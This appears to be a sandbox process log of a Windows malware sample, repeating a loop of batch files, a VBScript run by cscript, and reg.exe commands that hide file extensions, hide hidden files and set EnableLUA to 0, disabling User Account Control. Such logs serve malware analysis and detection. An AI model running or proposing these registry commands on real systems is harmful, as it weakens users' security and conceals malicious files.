C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gGkIkkEA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NSIYwIYE.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eucswEwo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YCEAcQII.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eMYkQcIU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lMYgoUEQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fAoUEIUM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XaEIQUMs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hoksgIww.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\twIsQMok.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NUsocQYM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uQIYwEkI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FysEMUYk.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IIEAIMEw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\REgEsAMI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VkgkocYM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KiEMcYMY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WgsIYMUM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AMkkEkIs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qEIUQUks.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ieQQMQgE.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

